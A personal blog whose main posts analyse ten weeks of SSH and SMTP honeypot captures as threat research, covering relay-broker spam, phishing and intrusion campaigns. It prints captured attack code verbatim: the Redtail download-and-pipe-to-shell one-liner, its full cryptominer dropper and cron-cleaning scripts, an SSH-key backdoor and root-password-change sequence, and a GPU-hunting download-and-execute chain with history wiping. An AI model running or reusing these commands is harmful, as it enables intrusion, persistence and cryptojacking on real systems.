Darkfoe's Blog (Chuck Findlay)

smtp honeypot - the black hole

2026-05-13 11:59pm

Alongside the SSH honeypot I've been running since early March, I also set up an SMTP honeypot on the same VPS - a fake open mail relay on port 25 that accepts everything and delivers it nowhere. This post covers the 10 weeks of messages that accumulated.

the indy scanner

The most frequent visitor by far is spameri@tiscali.it, showing up almost every single day:

From: spameri@tiscali.it
Subject: [honeypot IP]
To: spameri@tiscali.it
X-Priority: 3
X-Library: Indy 8.0.25

t_Smtp.LocalIP

The X-Library: Indy 8.0.25 header is the giveaway - Indy is an old networking library for Delphi/Pascal. The body t_Smtp.LocalIP is a Delphi variable name that was never resolved - someone's relay scanner has a bug that's been printing the variable name literally instead of the actual value. It's been doing this every day for ten weeks.

Worth noting: back when I ran mail servers I was seeing this exact address hitting them, and that was roughly 15 years ago. Whatever this is, it has been continuously running for a very long time.

the relay verification ecosystem

Once discovered, multiple independent services start tracking whether the relay stays up:

The "GOLD" alert showed up four separate times (March 10, April 21, April 24, May 4-5), each time blasting the same seven-or-so recipients:

Subject: VULNERABILITY PROOF: GOLD [redacted]

Vulnerability: GOLD
Target: [redacted]
IP: [honeypot IP]
Verified: 2026-03-10 13:16:55

"GOLD" appears to be their rating for a fully open, no-auth relay. This looks like a relay broker notifying buyers when a new relay comes online.

The marker system from one service sends a base64-encoded data blob to a fixed recipient with a unique random marker per send:

DATA For [honeypot IP]
Date: 22 : 03 : 2026
SMTP: [honeypot IP]:25
HOSTNAME: [honeypot hostname]
🔑 MARKER: 7FWC2ZG78S

Appeared twice then stopped - likely a monitoring service logging relays with timestamped proof-of-delivery.

The PHPMailer autodiscovery tests (System Test <it@[honeypot hostname]>) used PHPMailer 7.0.2 to send to several business addresses - probably automated deliverability-checking tools.

The "server details" dump sent the relay's full connection info to a small set of specific addresses including what looked like a lawyer/barrister inbox and personal accounts:

Mode: NOAUTH
IP: [honeypot IP]
Mailserver: [honeypot hostname]
Port: 25
User: N/A / Pass: N/A / SSL: False

Someone sharing relay credentials with specific people rather than broadcasting them.

the day-of-week tester

One sender uses test@test.com with Indy 9.00.10 and fires to a fixed recipient list with bodies that are just the day of the week, mangled:

COOK / MONDAEE / TUEDAEE / GOD OF SABBATH IS GOOD / SATURDAEE / THURS 444

Later the same sender/library combination starts routing actual scam content. Classic relay warm-up before graduating to payload.

the scam ecosystem

The bulk of the content is advance fee fraud. A few technical patterns:

Two senders used the same federalministryofagriculture@vp.pl From address with different personas - shared infrastructure or the same operator running parallel campaigns.

At least six distinct dying-widow/cancer-patient personas followed the same template: spoofed From on a legitimate-looking domain, Reply-To pointing to a personal Gmail. One sender fired two identical copies to the same list within minutes - no deduplication in the script.

The most persistent campaign ran almost daily from April 23 through today using the same fixed recipient list, alternating between two templates from the same reply-to. Still running when I pulled this data.

spoofing legitimacy

A few senders used real organization addresses as their From: header:

With no authentication on port 25, the From: header is meaningless - these senders are just borrowing visual authority.

the Standard Bank phishing

One elaborate message (April 10) impersonated Standard Bank of South Africa with full HTML formatting and branding images pulled from Google's image cache. The reply URL chain was a deeply-nested deref-mail.com redirect stack - roughly 20 levels of URL encoding deep - to obscure the final destination from link scanners. A raw IP address was accidentally left in the body text, probably a template error.

the word soup

Two messages from sting@terradevins.cat and sting@sopaic.com sent incoherent word salads with MID: hashes in the subject - spam scrambled to evade content filters. The actual payload was presumably a link or attachment that didn't make it through the honeypot.

what I've learned

On SSH I see people trying to gain access to machines. On SMTP I see what they do with open relays once they have them:

The Indy library shows up across multiple unrelated actors - there are clearly decades-old Delphi codebases still in active use for this.

Still collecting. Will follow up when I have connection log data to cross-reference.

honeypot - ten weeks later

2026-05-13 11:00pm

Ten weeks into running the honeypot and things have gotten more interesting. The previous post covered the redtail cryptominer - this one covers what else showed up, and some evolution of redtail itself.

redtail is still here, and keeps rotating C2

The same automated dropper (I'll call it RedtailBot) has not stopped. It has been hitting the honeypot every few hours since early March, and as of today is still going. The interesting part is watching its C2 server rotate - I'm just calling them C2-A through C2-E:

Period C2
March 2 - March 4 C2-A
March 5 - April 4 C2-B
April 5 - April 27 C2-C
April 21 - April 28 C2-D (overlap with C2-C)
April 28 - April 30 C2-E
May 1 - May 13 C2-F

Every session from RedtailBot is the same one-liner:

uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; (wget --no-check-certificate -qO- https://[C2]/sh || curl -sk https://[C2]/sh) | sh -s ssh

The hex in there decodes to auth_ok - so the bot is echoing a confirmation string back to whatever is listening. Since the honeypot has sh removed/broken, every attempt fails at the pipe stage with -bash: sh: command not found. It just keeps trying anyway.

At roughly 3-4 hits per day across 10+ weeks, that's somewhere around 300+ failed infection attempts from this one bot alone.

the "mdrfckr" backdoor

Starting March 24 and still showing up as late as May 1, a different campaign has been hitting the honeypot with a very manual-feeling sequence. I'll call the operator MdrfckrCrew after the comment in their SSH key:

cd ~; chattr -ia .ssh; lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">> .ssh/authorized_keys && chmod -R go= ~/.ssh
echo "root:[randompassword]"|chpasswd|bash
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

After establishing the backdoor it does a fairly thorough system survey - CPU model, RAM, disk, number of CPU cores, uptime, w, uname -m. Classic "is this machine worth keeping?" reconnaissance.

The same SSH public key with the comment mdrfckr shows up from three different source IPs spread across three different countries over about six weeks, which suggests this is a coordinated botnet with a shared key that gets dropped onto every new box. The password changes are different each time (e.g. m9Nj0SJj1Qjj, 1WODHU9OOXSH, hg28pZIb3Kbg), probably generated per-session.

The lockr command (alongside chattr) is worth noting - it's trying multiple anti-immutable-flag tools in case one isn't available. chattr is the standard Linux one but lockr isn't a standard tool - so either it's a custom binary or they're just throwing both at the wall.

the ".sysmonitor" dropper

Early April, several sessions I'll group as SysMonitorCrew started running a fingerprinting sequence followed by trying to download something to ~/.sysmonitor from a C2 I'll call SM-C2:

uname -s -v -n -r -m
nproc
uptime -p | awk '...'
awk -F: '/model name|Processor/ {gsub(/^ +/, "", $2); print $2; exit}' /proc/cpuinfo
curl -s https://ipinfo.io/org || wget -qO- https://ipinfo.io/org || ...
nvidia-smi -q | grep "Product Name" ...
nvidia-smi -q | grep "Attached GPUs" ...
curl -sSL http://[SM-C2]/[token] -o ~/.sysmonitor || wget -qO ~/.sysmonitor http://[SM-C2]/[token] || ...
chmod +x ~/.sysmonitor && ~/.sysmonitor && history -c && history -w

A few things stand out here. First, the nvidia-smi calls - this campaign is specifically GPU hunting. It checks both Product Name and Attached GPUs counts, so it's doing a proper survey before deciding what to drop. Second, the ISP lookup via ipinfo.io/org - probably filtering out residential connections or cloud providers it already has coverage on. Third, the history -c && history -w at the end to wipe bash history after running.

The binary URL has a long random-looking token path which is probably just obscurity rather than real security - but it does mean you can't accidentally stumble on it. The honeypot doesn't make outbound connections in real time, but URLs seen in sessions get queued and fetched separately at random intervals post-session - so the binary may already be sitting in storage, just not analyzed yet. Given the GPU focus, GPU-accelerated mining (or possibly a cryptostealer that targets GPU memory) seems the likely payload.

The same SM-C2 shows up across three different sessions from different source IPs on April 3-4, suggesting a coordinated campaign.

the docker/container escape probers

Starting April 17, a persistent source I'll call ContainerProber began hammering the honeypot with the same command over and over:

echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh

This ran for weeks - multiple times per day up through early May. What's interesting about this one is what it's actually checking for. Reading /proc/1/mounts and listing /proc/1/ is a standard container escape detection technique - if you're inside a Docker container, PID 1 won't be systemd and /proc/1/mounts will show overlay filesystems. The curl2 in there is probably a typo or a test binary it's looking for.

Starting in May, a cluster of Tor exit nodes started running a similar but slightly different variant:

echo "bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778084668565428669" | sh

The big number at the end changes every session - it looks like a session/tracking ID embedded in the payload. These are almost certainly separate operators from ContainerProber, but the same underlying goal: find containers with misconfigured host mounts or namespace leaks.

My honeypot exposes a fake /proc with limited entries, which is apparently convincing enough that they keep coming back.

the ELF checker

Three separate sessions (I'll call them ELFProbe) hit the honeypot with a very simple probe:

echo 1 && cat /bin/echo

The output in a real Linux system starts with ELF\x02\x01\x01 - so they're checking the ELF magic bytes to confirm they're actually on a Linux system and not some kind of fake/emulated environment. The honeypot faithfully serves back 1\nELF\x02\x01\x01\x00 and they seem satisfied with that.

One session also did:

echo 1 > /dev/null && cat /bin/echo

Which is basically the same thing but also checking that /dev/null behaves correctly. Shell capability probing getting more thorough over time.

the thorough fingerprinter

One session I'll call MegaScan ran the most comprehensive single-command fingerprint I've seen so far, all in one shot:

cat /proc/cpuinfo; echo ___SEP___; echo $((1337+1337)); echo ___SEP___; mount; echo ___SEP___; uname -a; echo ___SEP___; ls -la /; echo ___SEP___; whoami; echo ___SEP___; cat /etc/issue; echo ___SEP___; ps -ef; echo ___SEP___; free -m; echo ___SEP___; hostname

The $((1337+1337)) is a shell arithmetic test - if it outputs 2674 the shell is functional, if it outputs the literal string $((1337+1337)) it's a dumb shell or fake environment. The session lasted nearly 19 hours - kept open the whole time, probably waiting for a result that never came back to whoever was watching.

what I've learned

After ten weeks, the pattern is roughly: this honeypot IP gets picked up by mass scanners within hours, and then sits on multiple different botnet target lists simultaneously. The traffic breaks down into a few categories:

The infrastructure this thing is sitting on has a hostname that looks like a legitimate mail server - seems to be enough misdirection that at least some automated tools don't immediately filter it out.

Still watching. Will post again if anything interesting evolves.

Finally began deploying my homemade honeypot (emulated ssh server), and starting to get some interesting results, such as the below:

{
    "ip":"[redacted]",
    "rdns":"",
    "user":"root",
    "password":"[redacted - not important anyway]",
    "session_id":"e062ee72-efdc-41f1-ab8d-f8638b85ad03",
    "timestamp":{
        "session_start":"2026-03-02T04:09:24.410659709Z",
        "session_end":"2026-03-02T04:09:24.842450321Z"},
        "commands":[
            {
                "timestamp":"2026-03-02T04:09:24.751221551Z",
                "command":"uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"; (wget --no-check-certificate -qO- https://[redacted]/sh || curl -sk https://[redacted]/sh) | sh -s ssh"
            }
        ]
}

So breaking down the /sh part - I found it seems to run a cleanup script and downloads a binary based on the architechure. Also does a few checks on the way (see below)

#!/bin/bash

get_random_string() {
  len=$(expr $(od -An -N2 -i /dev/urandom 2>/dev/null | tr -d ' ') % 32 + 4 2>/dev/null)

  if command -v openssl >/dev/null 2>&1; then
    str=$(openssl rand -base64 256 2>/dev/null | tr -dc 'A-Za-z0-9' | head -c "$len")
    if [ -n "$str" ]; then
      echo "$str"
      return 0
    fi
  fi

  if [ -r /dev/urandom ]; then
    str=$(tr -dc 'A-Za-z0-9' </dev/urandom 2>/dev/null | head -c "$len")
    if [ -n "$str" ]; then
      echo "$str"
      return 0
    fi
  fi

  if [ -n "$RANDOM" ]; then
    echo "$RANDOM"
    return 0
  fi

  # If all else fails
  echo "redtail"
  return 1
}

dlr() {
  rm -rf $1
  wget --no-check-certificate -q https://[redacted]/$1 || curl -skO https://[redacted]/$1
}

NOEXEC_DIRS=$(cat /proc/mounts | grep 'noexec' | awk '{print $2}')
EXCLUDE=""

for dir in $NOEXEC_DIRS; do
  EXCLUDE="${EXCLUDE} -not -path \"$dir\" -not -path \"$dir/*\""
done

FOLDERS=$(eval find / -type d -user $(whoami) -perm -u=rwx -not -path \"/tmp/*\" -not -path \"/proc/*\" $EXCLUDE 2>/dev/null)
ARCH=$(uname -mp)
OK=true
FILENAME=".$(get_random_string)"

for i in $FOLDERS /tmp /var/tmp /dev/shm; do
  if cd "$i" && touch .testfile && (dd if=/dev/zero of=.testfile2 bs=2M count=1 >/dev/null 2>&1 || truncate -s 2M .testfile2 >/dev/null 2>&1); then
    rm -rf .testfile .testfile2
    break
  fi
done

dlr clean
chmod +x clean
sh clean >/dev/null 2>&1
rm -rf clean

rm -rf .redtail
rm -rf $FILENAME

if echo "$ARCH" | grep -q "x86_64" || echo "$ARCH" | grep -q "amd64"; then
  dlr x86_64
  mv x86_64 $FILENAME
elif echo "$ARCH" | grep -q "i[3456]86"; then
  dlr i686
  mv i686 $FILENAME
elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
  dlr aarch64
  mv aarch64 $FILENAME
elif echo "$ARCH" | grep -q "armv7"; then
  dlr arm7
  mv arm7 $FILENAME
else
  OK=false
  for a in x86_64 i686 aarch64 arm7; do
    dlr $a
    cat $a >$FILENAME
    chmod +x $FILENAME
    ./$FILENAME $1 >/dev/null 2>&1
    rm -rf $a
  done
fi

if [ $OK = true ]; then
  chmod +x $FILENAME
  ./$FILENAME $1 >/dev/null 2>&1
fi

And for its cleanup script it wants to run:

#!/bin/bash

clean_crontab() {
  chattr -ia "$1"
  grep -vE 'wget|curl|/dev/tcp|/tmp|\.sh|nc|bash -i|sh -i|base64 -d' "$1" >/tmp/clean_crontab
  mv /tmp/clean_crontab "$1"
}

systemctl disable c3pool_miner
systemctl stop c3pool_miner

chattr -ia /var/spool/cron/crontabs
for user_cron in /var/spool/cron/crontabs/*; do
  [ -f "$user_cron" ] && clean_crontab "$user_cron"
done

for system_cron in /etc/crontab /etc/crontabs; do
  [ -f "$system_cron" ] && clean_crontab "$system_cron"
done

for dir in /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly /etc/cron.d; do
  chattr -ia "$dir"
  for system_cron in "$dir"/*; do
    [ -f "$system_cron" ] && clean_crontab "$system_cron"
  done
done

clean_crontab /etc/anacrontab

for i in /tmp /var/tmp /dev/shm; do
  rm -rf $i/*
done

After some analysis of the binaries I have discovered nothing unexpected - ie in this case this was an XMR cryptominer with a unique name of "redtail" inside it, supporting multiple architechures. Likely hitting any IOT or VPS it can grab. Completely automated, roughly half hour intervals between attempting user/password combos until it gets in - then it seems roughly 8-12 hour reinfection attempts.

Unforurtunately, I was unable to get its configuration, so was not able to get a wallet address or command and control server. Server serving the binaries seems to just be a binary staging server, nothing special, so no leads there.

Will continue monitoring it for now to see if I find anything else. Eventually will build a analysis "pipeline" to see if I can see it evolve as it keeps retrying to re-infect.

Termux + Dex + code-server Claude

2026-02-22 1:30pm EST

So for anyone else trying to find a way to make Samsung dex work as a dev PC - termux with code-server works for obvious reasons (install extensions in the terminal - extensions don't install well in the UI) and use Claude code for the AI.

Co-pilot doesn't work, and Continue.dev does not work. Have yet to try Codex, but Claude works wonderfully out of the gate.

Took a break and played Delver

2024-01-16 9:30pm ADT

Went on a little break for playing video games, and today it was Delver. So far I have:

(Not only blogging on technical stuff - tossing the odd other thing onto here. This is the closest to social media I'll use.)

Good experience, will play again at some point to try to get to some sort of conclusion.